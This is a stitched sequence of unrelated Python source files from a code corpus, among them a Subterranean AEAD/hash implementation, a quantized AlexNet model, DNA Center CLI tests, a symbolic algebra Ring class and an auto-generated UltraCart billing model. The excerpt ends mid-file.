new_state = [state[i] for i in range(len(state))]
for i in range(r_calls):
new_state = subterranean_duplex(new_state, [])
return new_state
def subterranean_squeeze(state, size_l):
new_state = [state[i] for i in range(len(state))]
# Z <= *
Z = []
i = 0
while(i < size_l - 32):
temp_value_out = subterranean_extract(new_state)
new_state = subterranean_duplex(new_state, [])
Z = Z + temp_value_out
i += 32
temp_value_out = subterranean_extract(new_state)
new_state = subterranean_duplex(new_state, [])
Z = Z + temp_value_out[:(size_l-i)]
return new_state, Z
def subterranean_xof_init():
# S <= Subterranean()
state = subterranean_init()
return state
def subterranean_xof_update(state, message):
new_state = subterranean_absorb_unkeyed(state, message)
return new_state
def subterranean_xof_finalize(state, size_l):
# S.blank(8)
new_state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
new_state, z = subterranean_squeeze(new_state, size_l)
return new_state, z
def subterranean_xof_direct(message, size_l):
# S <= Subterranean()
state = subterranean_init()
# Only one single message to absorb
state = subterranean_absorb_unkeyed(state, message)
# S.blank(8)
state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
state, z = subterranean_squeeze(state, size_l)
return z
def subterranean_deck_init(key):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K,MAC)
state = subterranean_absorb_keyed(state, key)
return state
def subterranean_deck_update(state, message):
new_state = subterranean_absorb_keyed(state, message)
return new_state
def subterranean_deck_finalize(state, size_l):
# S.blank(8)
new_state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
new_state, z = subterranean_squeeze(new_state, size_l)
return new_state, z
def subterranean_deck_direct(key, message, size_l):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K,MAC)
    state = subterranean_absorb_keyed(state, key)
# Only one single message to absorb
state = subterranean_absorb_keyed(state, message)
# S.blank(8)
state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
    state, z = subterranean_squeeze(state, size_l)
return z
def subterranean_SAE_start(key, nonce):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
# S.blank(8)
state = subterranean_blank(state, 8)
return state
def subterranean_SAE_wrap_encrypt(state, associated_data, text, tag_length):
# S.absorb(A,MAC)
new_state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
new_state, new_text = subterranean_absorb_encrypt(new_state, text)
# S.blank(8)
new_state = subterranean_blank(new_state, 8)
# T <= S.squeeze(tau)
new_state, new_tag = subterranean_squeeze(new_state, tag_length)
return new_state, new_text, new_tag
def subterranean_SAE_wrap_decrypt(state, associated_data, text, tag, tag_length):
# S.absorb(A,MAC)
new_state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
new_state, new_text = subterranean_absorb_decrypt(new_state, text)
# S.blank(8)
new_state = subterranean_blank(new_state, 8)
# T <= S.squeeze(tau)
new_state, new_tag = subterranean_squeeze(new_state, tag_length)
# if op = decrypt AND (tag != new_tag) then (Y,T) = (*,*)
if(tag != new_tag):
new_text = []
new_tag = []
return new_state, new_text, new_tag
def subterranean_SAE_direct_encrypt(key, nonce, associated_data, text, tag_length):
# S <= Subterranean()
state = subterranean_init()
#print(bits_to_hex_string(state, False))
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
#print(bits_to_hex_string(state, False))
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
#print(bits_to_hex_string(state, False))
# S.blank(8)
state = subterranean_blank(state, 8)
#print(bits_to_hex_string(state, False))
# S.absorb(A,MAC)
state = subterranean_absorb_keyed(state, associated_data)
#print(bits_to_hex_string(state, False))
# Y <= S.absorb(X,op)
state, new_text = subterranean_absorb_encrypt(state, text)
#print(bits_to_hex_string(state, False))
# S.blank(8)
state = subterranean_blank(state, 8)
#print(bits_to_hex_string(state, False))
# T <= S.squeeze(tau)
state, new_tag = subterranean_squeeze(state, tag_length)
#print(bits_to_hex_string(state, False))
return new_text, new_tag
def subterranean_SAE_direct_decrypt(key, nonce, associated_data, text, tag, tag_length):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
# S.blank(8)
state = subterranean_blank(state, 8)
# S.absorb(A,MAC)
state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
state, new_text = subterranean_absorb_decrypt(state, text)
# S.blank(8)
state = subterranean_blank(state, 8)
# T <= S.squeeze(tau)
state, new_tag = subterranean_squeeze(state, tag_length)
# if op = decrypt AND (tag != new_tag) then (Y,T) = (*,*)
if(tag != new_tag):
print(tag)
print(new_tag)
new_text = []
new_tag = []
return new_text, new_tag
def crypto_hash(m, out_length_bytes):
m_bits = bytearray_to_bits(m)
hash_bits = subterranean_xof_direct(m_bits, out_length_bytes*8)
hash_out = bits_to_bytearray(hash_bits)
return hash_out
def crypto_aead_encrypt(m, ad, nsec, npub, k, t_length_bytes):
m_bits = bytearray_to_bits(m)
ad_bits = bytearray_to_bits(ad)
npub_bits = bytearray_to_bits(npub)
k_bits = bytearray_to_bits(k)
c_bits, t_bits = subterranean_SAE_direct_encrypt(k_bits, npub_bits, ad_bits, m_bits, t_length_bytes*8)
joined_c_bits = c_bits + t_bits
joined_c = bits_to_bytearray(joined_c_bits)
return joined_c
def crypto_aead_decrypt(c, ad, nsec, npub, k, t_length_bytes):
joined_c_bits = bytearray_to_bits(c)
c_bits = joined_c_bits[:len(joined_c_bits)-t_length_bytes*8]
t_prime_bits = joined_c_bits[len(joined_c_bits)-t_length_bytes*8:]
ad_bits = bytearray_to_bits(ad)
npub_bits = bytearray_to_bits(npub)
k_bits = bytearray_to_bits(k)
m_bits, t_bits = subterranean_SAE_direct_decrypt(k_bits, npub_bits, ad_bits, c_bits, t_prime_bits, t_length_bytes*8)
if(t_bits == []):
return None
m = bits_to_bytearray(m_bits)
return m
if __name__ == "__main__":
k = bytearray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
k = bytearray([0x50, 0x95, 0x3C, 0x61, 0x25, 0x4B, 0xA5, 0xEA, 0x4E, 0xB5, 0xB7, 0x8C, 0xE3, 0x46, 0xC5, 0x46])
npub = bytearray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
npub = bytearray([0xCF, 0x39, 0xCD, 0x54, 0x28, 0x5D, 0x19, 0x5E, 0xB8, 0x07, 0x65, 0xC6, 0x7B, 0x6E, 0x44, 0x77])
t_length_bytes = 16
m = bytearray([])
ad = bytearray([])
joined_c = crypto_aead_encrypt(m, ad, 0, npub, k, t_length_bytes)
print(binascii.hexlify(bytearray(joined_c)))
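    # Optional round-trip check (sketch): decrypting the ciphertext produced above
    # should recover the (empty) message m; crypto_aead_decrypt returns None when
    # the tag does not verify.
    m_check = crypto_aead_decrypt(joined_c, ad, 0, npub, k, t_length_bytes)
    assert m_check == m, "AEAD round-trip failed"
    print("AEAD round-trip OK")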
|
StarcoderdataPython
|
3364104
|
from .graclus import graclus_cluster
from .grid import grid_cluster
from .fps import fps
from .nearest import nearest
__version__ = '1.2.0'
__all__ = [
'graclus_cluster',
'grid_cluster',
'fps',
'nearest',
'__version__',
]
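# Hedged usage sketch (not executed on import; shapes and keyword names below are
# assumptions based on the public torch_cluster API, not guaranteed by this module):
#
#   import torch
#   from torch_cluster import grid_cluster, fps
#
#   pos = torch.rand(100, 3)                                       # 100 points in 3-D
#   cluster = grid_cluster(pos, torch.tensor([0.25, 0.25, 0.25]))  # voxel-grid ids
#   idx = fps(pos, ratio=0.5)                                      # farthest-point sampling indices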
|
StarcoderdataPython
|
5047828
|
<reponame>Zotkin/incremental_learning.pytorch<filename>inclearn/lib/loops/__init__.py
from .generators import *
from .loops import *
|
StarcoderdataPython
|
3403563
|
from gevent.wsgi import WSGIServer
from config import CONTAINER_CONFIG
from ContainerService import container_service
visualizer_service_server = WSGIServer(('', CONTAINER_CONFIG["port"]), container_service)
visualizer_service_server.serve_forever()
|
StarcoderdataPython
|
291845
|
# -*- coding: utf-8 -*-
"""DNACenterAPI Application Policy API fixtures and tests.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import click
import pytest
from json import loads
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '2.1.1', reason='version does not match')
def is_valid_get_applications_count(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_applications_count(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-applications-count',
"""--"""])
assert not result.exception
assert is_valid_get_applications_count(result)
def is_valid_create_application_set(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_create_application_set(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'create-application-set',
"""--active_validation=True""",
"""--payload='{"name": "string"}'"""])
assert not result.exception
assert is_valid_create_application_set(result)
def is_valid_edit_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_edit_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'edit-application',
"""--active_validation=True""",
"""--payload='{"id": "string", "name": "string", "networkApplications": [{"id": "string", "appProtocol": "string", "applicationSubType": "string", "applicationType": "string", "categoryId": "string", "displayName": "string", "engineId": "string", "helpString": "string", "longDescription": "string", "name": "string", "popularity": "string", "rank": "string", "trafficClass": "string", "serverName": "string", "url": "string", "dscp": "string", "ignoreConflict": "string"}], "networkIdentity": [{"id": "string", "displayName": "string", "lowerPort": "string", "ports": "string", "protocol": "string", "upperPort": "string"}], "applicationSet": {"idRef": "string"}}'"""])
assert not result.exception
assert is_valid_edit_application(result)
def is_valid_delete_application_set(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_delete_application_set(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'delete-application-set',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_application_set(result)
def is_valid_get_applications(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_applications(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-applications',
"""--limit=500""",
"""--name='string'""",
"""--offset=1"""])
assert not result.exception
assert is_valid_get_applications(result)
def is_valid_get_application_sets_count(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_application_sets_count(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-application-sets-count',
"""--"""])
assert not result.exception
assert is_valid_get_application_sets_count(result)
def is_valid_get_application_sets(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_application_sets(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-application-sets',
"""--limit=500""",
"""--name='string'""",
"""--offset=1"""])
assert not result.exception
assert is_valid_get_application_sets(result)
def is_valid_delete_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_delete_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'delete-application',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_application(result)
def is_valid_create_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_create_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'create-application',
"""--active_validation=True""",
"""--payload='{"name": "string", "networkApplications": [{"appProtocol": "string", "applicationSubType": "string", "applicationType": "string", "categoryId": "string", "displayName": "string", "engineId": "string", "helpString": "string", "longDescription": "string", "name": "string", "popularity": "string", "rank": "string", "trafficClass": "string", "serverName": "string", "url": "string", "dscp": "string", "ignoreConflict": "string"}], "networkIdentity": [{"displayName": "string", "lowerPort": "string", "ports": "string", "protocol": "string", "upperPort": "string"}], "applicationSet": {"idRef": "string"}}'"""])
assert not result.exception
assert is_valid_create_application(result)
|
StarcoderdataPython
|
3204171
|
__all__ = ['Ring', 'CommutativeRing']
from ..basealgebra import Algebra
from .interface import RingInterface
from ..core import init_module, classes
init_module.import_heads()
init_module.import_numbers()
@init_module
def _init(m):
from ..arithmetic import mpq
Ring.coefftypes = (int, long, mpq)
class Ring(Algebra, RingInterface):
"""
Ring represents algebraic ring (R, +, *) where (R, +) is abelian
group, (R,*) is monoid, with distributivity.
"""
@classmethod
def get_function_algebra(cls):
return classes.FunctionRing
def __str__(self):
h, d = self.pair
return h.data_to_str_and_precedence(type(self), d)[0]
def __pos__(self):
return self
def __neg__(self):
return self.head.neg(type(self), self)
def __add__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.add_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.add(cls, self, other)
__radd__ = __add__
def __iadd__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, other)
def __sub__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.sub_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.sub(cls, self, other)
def __rsub__(self, other):
return other + (-self)
def __isub__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, -other)
def __mul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.non_commutative_mul(cls, self, other)
def __rmul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_rmul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.non_commutative_mul(cls, other, self)
def __pow__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.pow_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.pow(cls, self, other)
def __rpow__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.pow(cls, other, self)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.non_commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self * other**-1
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other * self**-1
__truediv__ = __div__
def expand(self):
return self.head.expand(type(self), self)
def evalf(self, n=None):
return self.head.evalf(type(self), self, n)
class CommutativeRing(Ring):
def __mul__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_mul(cls, self, other)
__rmul__ = __mul__
def __imul__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.inplace_commutative_mul(cls, self, other)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_div(cls, self, other)
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_rdiv_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return other * self**-1
def to(self, target, *args):
""" Convert expression to target representation.
The following targets are recognized:
EXP_COEFF_DICT - convert expression to exponents-coefficient
representation, additional arguments are variables. When
no arguments are specified, variables will be all symbols
and non-power expressions used in the expression.
TERM_COEFF_DICT - convert expression to term-coefficient
representation. Note that the returned result may have
actual head NUMBER, SYMBOL, TERM_COEFF, POW, or
BASE_EXP_DICT instead of TERM_COEFF_DICT.
"""
head, data = self.pair
if target is head:
return self
if target is EXP_COEFF_DICT:
return head.to_EXP_COEFF_DICT(type(self), data, self, args or None)
if target is TERM_COEFF_DICT:
return head.to_TERM_COEFF_DICT(type(self), data, self)
raise NotImplementedError('%s.to(target=%r)' % (type(self), target))
def diff(self, symbol, order=1):
if order==0:
return self
cls = type(self)
if type(symbol) is cls:
assert symbol.head is SYMBOL,`symbol.pair`
symbol = symbol.data
elif isinstance(symbol, str):
pass
else:
raise TypeError('diff(symbol, order) first argument must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
try:
cache = {}
result = self.head.diff(cls, self.data, self, symbol, order, cache=cache)
finally:
cache.clear()
return result
def integrate(self, x):
cls = type(self)
t = type(x)
if t is tuple:
x, a, b = x
t = type(x)
else:
a, b = None, None
if t is cls:
assert x.head is SYMBOL,`x.pair`
x = x.data
elif t is str:
pass
else:
            raise TypeError('integrate(x,..), x must be str or %s instance but got %s instance' % (cls.__name__, type(x).__name__))
if a is None:
return self.head.integrate_indefinite(cls, self.data, self, x)
if type(a) is not cls:
a = cls(a)
if type(b) is not cls:
b = cls(b)
return self.head.integrate_definite(cls, self.data, self, x, a, b)
classes.Ring = Ring
classes.CommutativeRing = CommutativeRing
|
StarcoderdataPython
|
305426
|
from flask import jsonify, make_response
from flask import render_template, Blueprint
main = Blueprint('main', __name__, template_folder='templates')
@main.route('/')
def index():
return render_template('main/index.html')
@main.route('/json')
def json():
return make_response(jsonify(response='Hello world'), 200)
|
StarcoderdataPython
|
9712482
|
# Code modified from the AlexNet implementation of torchvision(https://github.com/pytorch/vision/blob/master/torchvision/models/alexnet.py)
import torch
import logging
import torch.nn as nn
from torch.utils.model_zoo import load_url as load_state_dict_from_url
from .qa import Quantization
_name_translation = {
'features.0': 'features_0.0',
'features.3': 'features_1.1',
'features.6': 'features_2.1',
'features.8': 'features_2.3',
'features.10': 'features_2.5',
'classifier.1': 'classifier_0.1',
'classifier.4': 'classifier_1.1',
'classifier.6': 'classifier_1.3'
}
class AlexNet(nn.Module):
def __init__(self, num_classes=1000, QA_flag=False, QA_bias=None, QA_values=None, QA_beta=None,
QA_outlier_gamma=0.001):
super(AlexNet, self).__init__()
self.ac_quan_values = QA_values
self.ac_quan_bias = QA_bias
self.ac_beta = QA_beta
self.QA_flag = QA_flag
self.QA_inited = False
self.count = 0
if num_classes == 1000:
self.c = [64, 192, 384, 256, 256]
self.ks = [11, 5, 3, 3, 3]
self.s = [4, 1, 1, 1, 1]
self.p = [2, 2, 1, 1, 1]
self.pool_ks = 3
else:
self.c = [64, 192, 384, 256, 256]
self.ks = [3, 3, 3, 3, 3]
self.s = [2, 1, 1, 1, 1]
self.p = [1, 1, 1, 1, 1]
self.pool_ks = 2
self.features_0 = nn.Sequential(
nn.Conv2d(3, self.c[0], kernel_size=self.ks[0], stride=self.s[0], padding=self.p[0]),
nn.ReLU(inplace=True),
)
self.features_1 = nn.Sequential(
nn.MaxPool2d(kernel_size=self.pool_ks, stride=2),
nn.Conv2d(self.c[0], self.c[1], kernel_size=self.ks[1], stride=self.s[1], padding=self.p[1]),
nn.ReLU(inplace=True),
)
self.features_2 = nn.Sequential(
nn.MaxPool2d(kernel_size=self.pool_ks, stride=2),
nn.Conv2d(self.c[1], self.c[2], kernel_size=self.ks[2], stride=self.s[2], padding=self.p[2]),
nn.ReLU(inplace=True),
nn.Conv2d(self.c[2], self.c[3], kernel_size=self.ks[3], stride=self.s[3], padding=self.p[3]),
nn.ReLU(inplace=True),
nn.Conv2d(self.c[3], self.c[4], kernel_size=self.ks[4], stride=self.s[4], padding=self.p[4]),
nn.ReLU(inplace=True),
)
self.maxpool = nn.MaxPool2d(kernel_size=self.pool_ks, stride=2)
self.classifier_0 = nn.Sequential(
nn.Dropout(p=0.1),
nn.Linear(256 * 6 * 6 if num_classes == 1000 else 256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
)
self.classifier_1 = nn.Sequential(
nn.Dropout(p=0.1),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
if self.QA_flag:
self.quan0 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan1 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan2 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan3 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.count = 4
def forward(self, x, input_ac_T=1):
x = self.features_0(x)
if self.QA_flag:
x = self.quan0(x, input_ac_T)
x = self.features_1(x)
if self.QA_flag:
x = self.quan1(x, input_ac_T)
x = self.features_2(x)
if self.QA_flag:
x = self.quan2(x, input_ac_T)
x = self.maxpool(x)
x = torch.flatten(x, 1)
x = self.classifier_0(x)
if self.QA_flag:
x = self.quan3(x, input_ac_T)
x = self.classifier_1(x)
return x
def alexnet(pretrained=False, **kwargs):
model = AlexNet(**kwargs)
if pretrained:
if 'num_classes' in kwargs.keys() and kwargs['num_classes'] != 1000:
logging.info('Can\'t load pre-trained model because target classes number isn\'t 1000(ImageNet).')
return model
model_path = 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth'
state_dict = load_state_dict_from_url(model_path)
new_state_dict = dict()
        # Pretrained parameter names must be translated to match the renamed
        # submodules (features_0, features_1, ...) used by this implementation.
for key, value in state_dict.items():
split_name = key.split('.')
module_name = split_name[0] + '.' + split_name[1]
if module_name in _name_translation.keys():
new_state_dict[_name_translation[module_name] + key[len(module_name):]] = value
else:
new_state_dict[key] = value
model.load_state_dict(new_state_dict)
return model
|
StarcoderdataPython
|
6560189
|
<filename>ultracart/models/order_billing.py
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2
OpenAPI spec version: 2.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OrderBilling(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'address1': 'str',
'address2': 'str',
'cc_emails': 'list[str]',
'city': 'str',
'company': 'str',
'country_code': 'str',
'day_phone': 'str',
'email': 'str',
'evening_phone': 'str',
'first_name': 'str',
'last_name': 'str',
'postal_code': 'str',
'state_region': 'str',
'title': 'str'
}
attribute_map = {
'address1': 'address1',
'address2': 'address2',
'cc_emails': 'cc_emails',
'city': 'city',
'company': 'company',
'country_code': 'country_code',
'day_phone': 'day_phone',
'email': 'email',
'evening_phone': 'evening_phone',
'first_name': 'first_name',
'last_name': 'last_name',
'postal_code': 'postal_code',
'state_region': 'state_region',
'title': 'title'
}
def __init__(self, address1=None, address2=None, cc_emails=None, city=None, company=None, country_code=None, day_phone=None, email=None, evening_phone=None, first_name=None, last_name=None, postal_code=None, state_region=None, title=None):
"""
OrderBilling - a model defined in Swagger
"""
self._address1 = None
self._address2 = None
self._cc_emails = None
self._city = None
self._company = None
self._country_code = None
self._day_phone = None
self._email = None
self._evening_phone = None
self._first_name = None
self._last_name = None
self._postal_code = None
self._state_region = None
self._title = None
self.discriminator = None
if address1 is not None:
self.address1 = address1
if address2 is not None:
self.address2 = address2
if cc_emails is not None:
self.cc_emails = cc_emails
if city is not None:
self.city = city
if company is not None:
self.company = company
if country_code is not None:
self.country_code = country_code
if day_phone is not None:
self.day_phone = day_phone
if email is not None:
self.email = email
if evening_phone is not None:
self.evening_phone = evening_phone
if first_name is not None:
self.first_name = first_name
if last_name is not None:
self.last_name = last_name
if postal_code is not None:
self.postal_code = postal_code
if state_region is not None:
self.state_region = state_region
if title is not None:
self.title = title
@property
def address1(self):
"""
Gets the address1 of this OrderBilling.
Address line 1
:return: The address1 of this OrderBilling.
:rtype: str
"""
return self._address1
@address1.setter
def address1(self, address1):
"""
Sets the address1 of this OrderBilling.
Address line 1
:param address1: The address1 of this OrderBilling.
:type: str
"""
if address1 is not None and len(address1) > 50:
raise ValueError("Invalid value for `address1`, length must be less than or equal to `50`")
self._address1 = address1
@property
def address2(self):
"""
Gets the address2 of this OrderBilling.
Address line 2
:return: The address2 of this OrderBilling.
:rtype: str
"""
return self._address2
@address2.setter
def address2(self, address2):
"""
Sets the address2 of this OrderBilling.
Address line 2
:param address2: The address2 of this OrderBilling.
:type: str
"""
if address2 is not None and len(address2) > 50:
raise ValueError("Invalid value for `address2`, length must be less than or equal to `50`")
self._address2 = address2
@property
def cc_emails(self):
"""
Gets the cc_emails of this OrderBilling.
CC emails. Multiple allowed, but total length of all emails can not exceed 100 characters.
:return: The cc_emails of this OrderBilling.
:rtype: list[str]
"""
return self._cc_emails
@cc_emails.setter
def cc_emails(self, cc_emails):
"""
Sets the cc_emails of this OrderBilling.
CC emails. Multiple allowed, but total length of all emails can not exceed 100 characters.
:param cc_emails: The cc_emails of this OrderBilling.
:type: list[str]
"""
self._cc_emails = cc_emails
@property
def city(self):
"""
Gets the city of this OrderBilling.
City
:return: The city of this OrderBilling.
:rtype: str
"""
return self._city
@city.setter
def city(self, city):
"""
Sets the city of this OrderBilling.
City
:param city: The city of this OrderBilling.
:type: str
"""
if city is not None and len(city) > 32:
raise ValueError("Invalid value for `city`, length must be less than or equal to `32`")
self._city = city
@property
def company(self):
"""
Gets the company of this OrderBilling.
Company
:return: The company of this OrderBilling.
:rtype: str
"""
return self._company
@company.setter
def company(self, company):
"""
Sets the company of this OrderBilling.
Company
:param company: The company of this OrderBilling.
:type: str
"""
if company is not None and len(company) > 50:
raise ValueError("Invalid value for `company`, length must be less than or equal to `50`")
self._company = company
@property
def country_code(self):
"""
Gets the country_code of this OrderBilling.
ISO-3166 two letter country code
:return: The country_code of this OrderBilling.
:rtype: str
"""
return self._country_code
@country_code.setter
def country_code(self, country_code):
"""
Sets the country_code of this OrderBilling.
ISO-3166 two letter country code
:param country_code: The country_code of this OrderBilling.
:type: str
"""
if country_code is not None and len(country_code) > 2:
raise ValueError("Invalid value for `country_code`, length must be less than or equal to `2`")
self._country_code = country_code
@property
def day_phone(self):
"""
Gets the day_phone of this OrderBilling.
Day time phone
:return: The day_phone of this OrderBilling.
:rtype: str
"""
return self._day_phone
@day_phone.setter
def day_phone(self, day_phone):
"""
Sets the day_phone of this OrderBilling.
Day time phone
:param day_phone: The day_phone of this OrderBilling.
:type: str
"""
if day_phone is not None and len(day_phone) > 25:
raise ValueError("Invalid value for `day_phone`, length must be less than or equal to `25`")
self._day_phone = day_phone
@property
def email(self):
"""
Gets the email of this OrderBilling.
Email
:return: The email of this OrderBilling.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""
Sets the email of this OrderBilling.
Email
:param email: The email of this OrderBilling.
:type: str
"""
if email is not None and len(email) > 100:
raise ValueError("Invalid value for `email`, length must be less than or equal to `100`")
self._email = email
@property
def evening_phone(self):
"""
Gets the evening_phone of this OrderBilling.
Evening phone
:return: The evening_phone of this OrderBilling.
:rtype: str
"""
return self._evening_phone
@evening_phone.setter
def evening_phone(self, evening_phone):
"""
Sets the evening_phone of this OrderBilling.
Evening phone
:param evening_phone: The evening_phone of this OrderBilling.
:type: str
"""
if evening_phone is not None and len(evening_phone) > 25:
raise ValueError("Invalid value for `evening_phone`, length must be less than or equal to `25`")
self._evening_phone = evening_phone
@property
def first_name(self):
"""
Gets the first_name of this OrderBilling.
First name
:return: The first_name of this OrderBilling.
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""
Sets the first_name of this OrderBilling.
First name
:param first_name: The first_name of this OrderBilling.
:type: str
"""
if first_name is not None and len(first_name) > 30:
raise ValueError("Invalid value for `first_name`, length must be less than or equal to `30`")
self._first_name = first_name
@property
def last_name(self):
"""
Gets the last_name of this OrderBilling.
Last name
:return: The last_name of this OrderBilling.
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""
Sets the last_name of this OrderBilling.
Last name
:param last_name: The last_name of this OrderBilling.
:type: str
"""
if last_name is not None and len(last_name) > 30:
raise ValueError("Invalid value for `last_name`, length must be less than or equal to `30`")
self._last_name = last_name
@property
def postal_code(self):
"""
Gets the postal_code of this OrderBilling.
Postal code
:return: The postal_code of this OrderBilling.
:rtype: str
"""
return self._postal_code
@postal_code.setter
